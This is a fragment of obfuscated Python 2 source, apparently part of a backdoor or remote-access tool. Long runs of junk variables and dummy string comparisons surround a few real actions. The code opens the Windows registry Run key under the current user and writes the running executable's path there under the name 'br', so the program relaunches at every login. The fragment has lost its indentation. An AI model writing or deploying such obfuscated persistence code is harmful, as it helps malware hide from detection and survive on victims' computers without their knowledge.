if QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh in YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv:
QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh = NhvUOqUUVggsKMPNmxBNkbudmyxbuRuEngqsoDJGPyUJiCFWRfZXKjjiGGMquMbTUEfwcHIkrmFZOTISyEsiDSagWnhVurTCIfghOfuXJwAacscefuAyuComyCVlXcDo
if YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv in dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl:
YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv = QxliQfauwlmhOuSYpAIbBkEZFlfeznzracnBcvkPtnPjyRcihsWfrWTiIEqKwMArosKdwsiOmlOQacQFsMnfLclMLbwmuPcImtulFPZutlcTnqWjHTKEhATDnOjUVwvu
elif YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv in QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh:
dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl = YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv
if dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl in YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv:
YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv = NhvUOqUUVggsKMPNmxBNkbudmyxbuRuEngqsoDJGPyUJiCFWRfZXKjjiGGMquMbTUEfwcHIkrmFZOTISyEsiDSagWnhVurTCIfghOfuXJwAacscefuAyuComyCVlXcDo
OFYOrQTjPDMdyMxXbucVEplFSprvdZCBLjTmLnwwyFPfxCRnOzwMgVuhQbWUDugWXCWtFlsAKwqprMqSZyyaAGkBszlDiyRjqqnSIMJTzEqbbAbkVjEPIRpjnmHpzBmk = r'Software\Microsoft\Windows\CurrentVersion\Run'
duwNmSbNqhezYvYVbmYolkcIfzwmSMhVUZhmQPiCgfRCLXwAZeylZLUkNmiasZeALsKUVfECqnLNsabEXZkPcwATiOcbmBPJRxfHkWtbVPbYiMDFPlMOpvoWBcItvGiu = 'kYfpVogACMUyTGupWqnkUFbcKkmoutLTzXNNoZyJtkkezEkwNQKCTNjhBldqnetREIfdGrhjawfXiTwVnWsARdGEdyWsWbUtkHUgSLkkVOpfLACLfOBBAbKFuFvKsZAa'
zyfmnVbxEvgYLBCKeISlSlRYqrsxrFBqGPySLTmgeiZpnMxXejxyEUDwIUuCAPVunUcfxdvISvvtROuSeKmkNTgDJLsmgVQXWNCcCPDsroprGEtSsCjQssUuPgfLKyiB = 'MWsqnqvCiWFovtsYkTjHkrgqcsEzhpJvjLwNgjrojOSFutuDTrHWvkiYwcYaomcZZkZMyguEYysBulqbZLTVsRyBMgRJGygpiusshxNpUCwCrSUtNjQZsZYzCMUBIAOo'
GoDuxbDEHlHlxyeiTXJaGgEzAHgJLeCXQcqVVcraKmpZzFvyaQoCqTEXurRQTSIeJLoeCbukLkgEFdrkjvdKFKgisxoVydkBjnAeTbZEZgmaXEFjIGcRQSrFfvHubsNw = 'IeCWUwvwmxfkNQwOaaXGnDdEjaOVoQrJWUoDMvwXOYMddkcScOleCsaNqSWQXImsAQWAQnsJhIGTApTcqLtEKsxoIyImAPpoiuFkuRzaAkaDfbuJEZTddFwphsOkQvqy'
if duwNmSbNqhezYvYVbmYolkcIfzwmSMhVUZhmQPiCgfRCLXwAZeylZLUkNmiasZeALsKUVfECqnLNsabEXZkPcwATiOcbmBPJRxfHkWtbVPbYiMDFPlMOpvoWBcItvGiu == zyfmnVbxEvgYLBCKeISlSlRYqrsxrFBqGPySLTmgeiZpnMxXejxyEUDwIUuCAPVunUcfxdvISvvtROuSeKmkNTgDJLsmgVQXWNCcCPDsroprGEtSsCjQssUuPgfLKyiB:
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = 'oVmGrQXTAFxNmdEDgQSPkFBLJpzRRtmDYCcALjlFWeHOKICFqrKZOEvyKdLDsPSZitaSgGpoTCZIpNwcXMHCxgQWvOVcZztzDNyfziObIVOAIbKvRJVjJTrBYVhHuPgU'
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = duwNmSbNqhezYvYVbmYolkcIfzwmSMhVUZhmQPiCgfRCLXwAZeylZLUkNmiasZeALsKUVfECqnLNsabEXZkPcwATiOcbmBPJRxfHkWtbVPbYiMDFPlMOpvoWBcItvGiu
else:
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = 'oVmGrQXTAFxNmdEDgQSPkFBLJpzRRtmDYCcALjlFWeHOKICFqrKZOEvyKdLDsPSZitaSgGpoTCZIpNwcXMHCxgQWvOVcZztzDNyfziObIVOAIbKvRJVjJTrBYVhHuPgU'
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = GoDuxbDEHlHlxyeiTXJaGgEzAHgJLeCXQcqVVcraKmpZzFvyaQoCqTEXurRQTSIeJLoeCbukLkgEFdrkjvdKFKgisxoVydkBjnAeTbZEZgmaXEFjIGcRQSrFfvHubsNw
GpscRjtNBjoEOYQCdDQVaNrOQBMYgQDRJYAJiXTcnYCvjLftSUIVpcNKaRIypmqGnfGpyUERCZjOlSWPPkFHcBgfimwkLcUeDjFzABiXjWKZkQLVWvjiTxhQRHqjfdHM = sys.executable
DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH = 'CppleEdYKANKqwlVMtsBXnTarncJJkELARumArbDYIDQRvAqAeVqrQywcAZsXhkPRNGJhGNYFzjKljdlwcCsthkJRprsWYxQcWImGxPtNysLNYSoActPbFypegnhORAT'
TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc = 'psieyAfAKMRyWXGLtVALAuyRAhQszaJIdHXTcjkmlsPCkLEAonUtVXkGjDRKvlfXAvIQNlerQxcGjlsuBaMyUdqsZhjVllVuaXPldhMgXPOQCHktvBwoWvIVVxgdZfEJ'
iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf = 'pdapVVMxdCOKcJWsDpTmOrxLiyGkfryLErTAFMkWxrChKmptGbZoHrOFdGGzvHYEJbQGAcbTignWInCNwPOIOkpmvqTGjlwuaBYFVEKMXqUMjhNOQmfqRipzYJKtWLfg'
VOBMebKlilhPQJErobFyJzEtWJnorgPdvXdRdfVXtHLZRcjqkSzivnPJTrTirtaoybhRgljQXUYGJytQWGAVkCMlDtMmGyasansDRrurGUeNxWcXuKKtUtDQcnkcIrVX = 'QihzhlyiELDMiHnbFWfnmQMUhdBBeJpUqxIzGLAAkaksOugOfFacAteCGSjsKFwBMkQlEOgXrHJJIyidWMJEioOfoPlkCGlZmNFYHjToiFPDnpbrQXhUckLbjZujgYEN'
gbnPfLcePzNTqnojRKoZIWPXdZUcEkiGwmYLeWAATUuTlBYJnJMiAGBKQrzIHsnyKlFFeBMvuVxRSyzOAeimcEajDoEThwllXhtFLFUoCZZxjucYmUAqFdGehzMxZZmq = 'nZmDpUrJGoPAIPCaqyNzMQIuBdBhzUUbLvSQDKDlihCkrhQptATfdaZfDVvbQXKXWCYtRLklmVvdlDDZRJGzmTaJhPdCLVCOZKHKvvZVISvQOENqcqCVFPyTZEkXePzR'
if DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH in TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc:
DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH = gbnPfLcePzNTqnojRKoZIWPXdZUcEkiGwmYLeWAATUuTlBYJnJMiAGBKQrzIHsnyKlFFeBMvuVxRSyzOAeimcEajDoEThwllXhtFLFUoCZZxjucYmUAqFdGehzMxZZmq
if TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc in iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf:
TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc = VOBMebKlilhPQJErobFyJzEtWJnorgPdvXdRdfVXtHLZRcjqkSzivnPJTrTirtaoybhRgljQXUYGJytQWGAVkCMlDtMmGyasansDRrurGUeNxWcXuKKtUtDQcnkcIrVX
elif TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc in DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH:
iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf = TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc
if iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf in TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc:
TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc = gbnPfLcePzNTqnojRKoZIWPXdZUcEkiGwmYLeWAATUuTlBYJnJMiAGBKQrzIHsnyKlFFeBMvuVxRSyzOAeimcEajDoEThwllXhtFLFUoCZZxjucYmUAqFdGehzMxZZmq
try:
wOJZRPdZrPpSdrbzjQmuPWMWIVJvPmHmXFkeaWWqmQsmWDwTiAgVvICBlfcPEAQdqHyurubuoaqmuWxjerYzVDlwStLuamyImaSNWQkwsMKxPeYYRVGOVTFDHgsGcSVv = 'GdLxJglodwNUCkognzXOZLAccgkbOuDXpPyIeXzmGwGDhOIPBenXFDiFMPEOgkZfgLGBTwaRyIAOqbWTyJtGufEPNMyBdMLervejQmehoNBiGyWhiGYYoGSnLJupTikk'
WyNLpqymtcnwHXdAdZJBvetpswBiQobfKLarDAAulSxExMjyBXROYzcAmZjNKOkhoIZKyhNVEPaDjJjNOLuDkDDUTegWdJkZkJNTwVbkcdQgZUfdLFOuNpZatPntjSKL = 'mfZsLJYGfEfYHGqAAddRCyJESWVItVMNlPTUkGTkcJSNnmuolAfsuIyWMPisOQJwDSRZybzyClTnXrFlBFeDgDVLJMBiFjfdjIjvfNHZqufqwbquiCOoNyHZuqjnnITk'
WqGhLvLxlPvfjWhLDNBZoxWKqCBBHUqTlbMyOJbvzLUAkOpnLXMMSIunahjcMPFaYQArmBZwPRRzXeDfsdUZWcvTZmqMkZHhwnNFWRrucgNWgqayyMqyXIMqFuaABZrJ = 'HKECgyRsesyBZlxnqppUrSTeRxpcEvKMUgkhBRoXvNGaqHjpQvxSGCuCwlolahEasxcYTrtbPMHOAXzTIpthTpjYTFzdQacuZeaMEaoXWDdyjPilxXFEqOXRqYFajPnx'
if wOJZRPdZrPpSdrbzjQmuPWMWIVJvPmHmXFkeaWWqmQsmWDwTiAgVvICBlfcPEAQdqHyurubuoaqmuWxjerYzVDlwStLuamyImaSNWQkwsMKxPeYYRVGOVTFDHgsGcSVv == WyNLpqymtcnwHXdAdZJBvetpswBiQobfKLarDAAulSxExMjyBXROYzcAmZjNKOkhoIZKyhNVEPaDjJjNOLuDkDDUTegWdJkZkJNTwVbkcdQgZUfdLFOuNpZatPntjSKL:
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = 'oMQqaAFXeVtZCsJDFykxjBigOohNxSuHdOzRccwEoaayGJltmJFcpbWOFnOtvczKmPvJVDGiCfnRxOrkCBFHoJQdszfdJpsbmRuSqhVpFgDTLuTLYJvBpHXPjTwrqExI'
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = wOJZRPdZrPpSdrbzjQmuPWMWIVJvPmHmXFkeaWWqmQsmWDwTiAgVvICBlfcPEAQdqHyurubuoaqmuWxjerYzVDlwStLuamyImaSNWQkwsMKxPeYYRVGOVTFDHgsGcSVv
else:
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = 'oMQqaAFXeVtZCsJDFykxjBigOohNxSuHdOzRccwEoaayGJltmJFcpbWOFnOtvczKmPvJVDGiCfnRxOrkCBFHoJQdszfdJpsbmRuSqhVpFgDTLuTLYJvBpHXPjTwrqExI'
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = WqGhLvLxlPvfjWhLDNBZoxWKqCBBHUqTlbMyOJbvzLUAkOpnLXMMSIunahjcMPFaYQArmBZwPRRzXeDfsdUZWcvTZmqMkZHhwnNFWRrucgNWgqayyMqyXIMqFuaABZrJ
WFIKqgbCnztsDtHohfvZNMDcKqDtOugqyVnPwCZCbNOlBfosZOtPVzyiJzFkxbxHAKXrKtGCZXfZDfDgwsIJdYhUzHlejUhnpfzQRfGkiXUlBTYhcfOpnlZcimgEvCOJ = _winreg.OpenKey(HKCU, OFYOrQTjPDMdyMxXbucVEplFSprvdZCBLjTmLnwwyFPfxCRnOzwMgVuhQbWUDugWXCWtFlsAKwqprMqSZyyaAGkBszlDiyRjqqnSIMJTzEqbbAbkVjEPIRpjnmHpzBmk, 0, _winreg.KEY_WRITE)
SJpMMniUQaVRgUAmCZhKSGTZtkuOoOtEEEARWHXXVvDHgjzPUBMiyXbUugZmJCwQGpUtgkbXkrshVfZFJmnaiZqITzXjeRDoVJDWALFtUWiUaOdTdbxszjsYgVJvcDkZ = 'enZzGFdspladIwZnHHGZQnSAekZmpAxzWpxwUErGwCaiOkhpfobbyTPsrpNyNPPWMkCRxJXiIQsiYmOvSJlktHmqOsAfnWOutvCiEvVAlonKLusgXNHwTTwNndmSAsrE'
RnEWhQjHlYtwrBOTUdKhPuUzDBMFbnFNjlIebLoHPPGVOPHrtkwRUxSkULdBXHKLHpnKfEgstMycpABCaehbURoRBqfNjYToYcomylbUdeyOPqdSZNJutPoDcdAfaqGJ = 'voyCWxBORNzspmdhPtaOxhJtWyOfLCdTEhWLWneMDdgJrnpeJgPOFnToWWXQuDZoorGgbSfsaKCsbBIFGkVRaOTLVdqPbsKaAOvFhtdfBKDXZqPvHbHEiHnIfpqthApZ'
TsWmlOYedaIBWGKIuYAKGKIiptXLKMDMbuJeUSRnpyTqDeVcJOquDxPqAxzlukPZNtLDEdbhspuCSvgAIdKIIkFvqEbvIjCgfFUrFaBEruSqOTMnjjOnvynNDCyRBydR = 'RSiNFXxyaWINOtSgGMbBUfNatwoqFxGWOFCXDKWKgltxskAqmxWyjYbggIbnCgMagZOzBtRrjRGvLnyUCKqAbuCmNsBvbhcMCoKqHqabapqqZUnHZjMyLqkFkwllVlYS'
dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg = 'JyxqLphdZhedcNWcZkyjINWbPNzvhMXWCfgQlMaTYruxdEfQphKyeyDbLlqDyLVbEZzKfxWbUNPrxnrGBVsweECluKdAUfyBGRvXALUQfYWKHDelBjKtuYfQLezBGXqu'
SAZWzuVsuYkGmVoFeLvgumzJnTATmgmDhFtohUnLxNIBrmtqHdwGiUpHVDntBuyLhhepeOQqtIcXTNwMymMGeCmBUUmpdwvVlolGbmbMqhTLQjCkwmXIAEcKUspQsrYw = 'DCUGKeKCFKHPTiYGuiwSuHjvnYEgxORkOrVgXKoHyEkPBzpNgFwENCLWdFzUngySzipzyQLXDMNhjAylZYZpvyfzMjsfbJbmmdItpFShpadhGWesOihMxSuQjlIVWOmo'
ReFFBAlKciuTIBfZvxssUrpxIvHndpsTHEoJSpSoAqOvmukEdbOTQxfjutFDVSDRtGeEyIwuPrnZgbdNMWisxPBCreHTDvdOeiQjcPlrcvgKXJlGUDLaJxkxZAcxAJXv = 'mVhcUuuFKOFnhJpaSqeArKXFFJOmAvLYgXAQEImcfoHwzqjunvfCWFoKkFpOzRwlWvBzvFqOlXBddHDrPEIcJnJaxeZMxMfiHDDpjspsDvFTMUVdaAGCzIVcDOtFKjXp'
if TsWmlOYedaIBWGKIuYAKGKIiptXLKMDMbuJeUSRnpyTqDeVcJOquDxPqAxzlukPZNtLDEdbhspuCSvgAIdKIIkFvqEbvIjCgfFUrFaBEruSqOTMnjjOnvynNDCyRBydR == dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg:
for ReFFBAlKciuTIBfZvxssUrpxIvHndpsTHEoJSpSoAqOvmukEdbOTQxfjutFDVSDRtGeEyIwuPrnZgbdNMWisxPBCreHTDvdOeiQjcPlrcvgKXJlGUDLaJxkxZAcxAJXv in SAZWzuVsuYkGmVoFeLvgumzJnTATmgmDhFtohUnLxNIBrmtqHdwGiUpHVDntBuyLhhepeOQqtIcXTNwMymMGeCmBUUmpdwvVlolGbmbMqhTLQjCkwmXIAEcKUspQsrYw:
if ReFFBAlKciuTIBfZvxssUrpxIvHndpsTHEoJSpSoAqOvmukEdbOTQxfjutFDVSDRtGeEyIwuPrnZgbdNMWisxPBCreHTDvdOeiQjcPlrcvgKXJlGUDLaJxkxZAcxAJXv == dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg:
SAZWzuVsuYkGmVoFeLvgumzJnTATmgmDhFtohUnLxNIBrmtqHdwGiUpHVDntBuyLhhepeOQqtIcXTNwMymMGeCmBUUmpdwvVlolGbmbMqhTLQjCkwmXIAEcKUspQsrYw = SJpMMniUQaVRgUAmCZhKSGTZtkuOoOtEEEARWHXXVvDHgjzPUBMiyXbUugZmJCwQGpUtgkbXkrshVfZFJmnaiZqITzXjeRDoVJDWALFtUWiUaOdTdbxszjsYgVJvcDkZ
else:
dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg = RnEWhQjHlYtwrBOTUdKhPuUzDBMFbnFNjlIebLoHPPGVOPHrtkwRUxSkULdBXHKLHpnKfEgstMycpABCaehbURoRBqfNjYToYcomylbUdeyOPqdSZNJutPoDcdAfaqGJ
_winreg.SetValueEx(WFIKqgbCnztsDtHohfvZNMDcKqDtOugqyVnPwCZCbNOlBfosZOtPVzyiJzFkxbxHAKXrKtGCZXfZDfDgwsIJdYhUzHlejUhnpfzQRfGkiXUlBTYhcfOpnlZcimgEvCOJ, 'br', 0, _winreg.REG_SZ, GpscRjtNBjoEOYQCdDQVaNrOQBMYgQDRJYAJiXTcnYCvjLftSUIVpcNKaRIypmqGnfGpyUERCZjOlSWPPkFHcBgfimwkLcUeDjFzABiXjWKZkQLVWvjiTxhQRHqjfdHM)
SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv = 'aczuFUFEtJKVdRDEeWCVTpJUkLJXuUspgyOwAWpIWXAWsjWGOspwtYYANoWocNkMXvrGhTUGtqnDNehclsGriDTLQGCHbCcesxlwlfKiBEaxjalNobNsgnLmRPhUHRsF'
vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ = 'VXHRhgSvpczWmOlslVGZNPKVekRuffXKeYSPErbrCZaOMGlxibqAvnBqXCHVJzWxBsXCtVAHVTuqRKPTVQhSNhxEXMoSLMryXeJDteTojfbUDantuFuOYlcwhkKBOdiP'
KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu = 'htWraAHNhycJERZVlwTorazGVcUYvhSiaEwlmzvrhXwuIPCkdROWrkBmVHyHPApxlUieSfqzRtmFcdaywlvtTlzUYPWhsZNvDyVFzXfCkYUkEkCPzjOWVEKdSfFRkSLj'
sJePUrTyillNzFFIJVihVacRwARaJRTmKkvfyqVVpqynjrWhhtATrsaFHXcQHKNZSJgwSxOXCnryHAEpboPPDbUeJaXBgNeWozSsRbXyvlGfPvsfeeZKTYrxdDxZMjRs = 'CFXDjYTqsSotEteUzKtrxmVEmPWYLokCLEdTXQvItzIbDezcMHgthfZYgKpSEYJBHMZiIkcvnBAVMFuutnHoGyxbmilcLCTchTEPqQbVNQsDPtKFUQQBnNlMYJxrSigA'
vVPccuVHBdpXVAfvMydBKAqVHSVncwkHoxdSZyPyxgbiFEwJwFDVTlVFIzvIEcTKeTpqrdxCAmQpjbopwYpNYfzkzQqzMeMQlCHQduxCJTgmnNUZrBEaDXQIPTLBvdVM = 'kFZPaWMllggqQLVZbmJoWJyWCdfAHeKUnJLpEBUvcsSMIXOfaAPjKVSedjciSsKkGXTuvpcgnHOQwthMOsNPutaTGAumHZLEgHZqAtbwUpJSyDBZshnuZaRbfnLBtfYx'
if SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv in vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ:
SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv = vVPccuVHBdpXVAfvMydBKAqVHSVncwkHoxdSZyPyxgbiFEwJwFDVTlVFIzvIEcTKeTpqrdxCAmQpjbopwYpNYfzkzQqzMeMQlCHQduxCJTgmnNUZrBEaDXQIPTLBvdVM
if vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ in KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu:
vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ = sJePUrTyillNzFFIJVihVacRwARaJRTmKkvfyqVVpqynjrWhhtATrsaFHXcQHKNZSJgwSxOXCnryHAEpboPPDbUeJaXBgNeWozSsRbXyvlGfPvsfeeZKTYrxdDxZMjRs
elif vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ in SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv:
